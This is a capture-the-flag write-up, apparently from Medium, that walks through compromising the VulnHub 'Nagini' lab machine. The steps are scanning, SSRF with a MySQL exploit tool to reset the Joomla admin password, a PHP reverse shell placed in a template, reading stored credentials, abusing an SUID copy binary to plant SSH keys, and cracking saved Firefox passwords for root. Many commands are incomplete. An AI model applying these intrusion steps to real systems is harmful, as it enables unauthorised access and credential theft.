VulnHub: HarryPotter: Nagini

Today we will take a look at Vulnhub: Nagini. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open — open

  • Gobuster

Command: gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt

We found an directory here: note.txt

Hello developers!!

I will be using our new HTTP3 Server at https://quic.nagini.hogwarts for further communications.
All developers are requested to visit the server regularly for checking latest announcements.


Here we see the word http3, let’s research.

Let’s download and setup.

Command: git clone — recursive

Command: cargo build — examples

Command: cd target/debug/examples

Command: ./http3-client

<title>Information Page</title>
Greetings Developers!!

I am having two announcements that I need to share with you:

1. We no longer require functionality at /internalResourceFeTcher.php in our main production servers.So I will be removing the same by this week.
2. All developers are requested not to put any configuration’s backup file (.bak) in main production servers as they are readable by every one.


When we look at the /internalResourceFeTcher.php extension, we see a button. When I thought it was a command injection, it didn’t work. I doubted it was ssrf. For this I wrote and the result:

We also found the /joomla extension. The .bak file can be found here. Let’s check

Command: joomscan -u

[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.9.25

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page :

[+] Checking robots.txt existing
[++] robots.txt is found
path :

Interesting path found from robots.txt

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config file is found
config file path :

Let’s download the .bak file and look at its contents.

The part we need:

public $dbtype = ‘mysqli’;
public $host = ‘localhost’;
public $user = ‘goblin’;
public $password = ‘’;
public $db = ‘joomla’;
public $dbprefix = ‘joomla_’;

We found ssrf here. Now we have a database. We will use this vulnerability to view and make changes to the database data.

Therefore, we will use this tool

Command: git clone

Command: python2 — exploit mysql

Let’s enter the data.

We get it after pasting it on the button.

Now we will get more detailed information.

I tried to crack hash here. But i can’t. Therefore, I will check the update.

Command: use joomla;update joomla_users set password=’5f4dcc3b5aa765d61d8327deb882cf99'where username=’site_admin’

Here is the password changed. Let’s log in as an administrator.

Get reverse shell

Extensions — >Templates — >Protostar — > New File

Change your ip address and get a paste. Then go to this directory.

Url- http://yourip/joomla/templates/protostar/rev.php

After entering

Command: script /dev/null -c bash

Command: export TERM=xterm

  • Snape

Command: cd /home/snape

Command: cat .creds.txt

Decode with Base64

Pass: Love@lilly

Command: su snape

  • Hermiona

Command: ssh-keygen -f hermoine

Command: python3 -m http.server 80

In target

Command: cd /home/snape/

Command: wget

Command: mv authorized_keys

Command: chmod 640 authorized_keys

Command: cd /home/hermoine/bin/

Command: ./su_cp -p -r /home/snape/authorized_keys /home/hermoine/.ssh/

  • Ssh

Command: ssh hermoine@ -i hermoine

  • Root

There was a .mozilla folder in the Hermione folder. When I looked inside the folders, I was confronted with such information.

command: cd /home/hermoine/.mozilla/firefox/g2mhbq0o.default



I need to transfer these two files to my local machine to crack the passwords.

Command: python3 -m http.server

I will use this tool to break it.

Command: git clone

Command: sudo pip install -r requirements.txt

After uploading two files from the target machine, start the tool.

Command: python

Here we found the root password

Command: su root

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store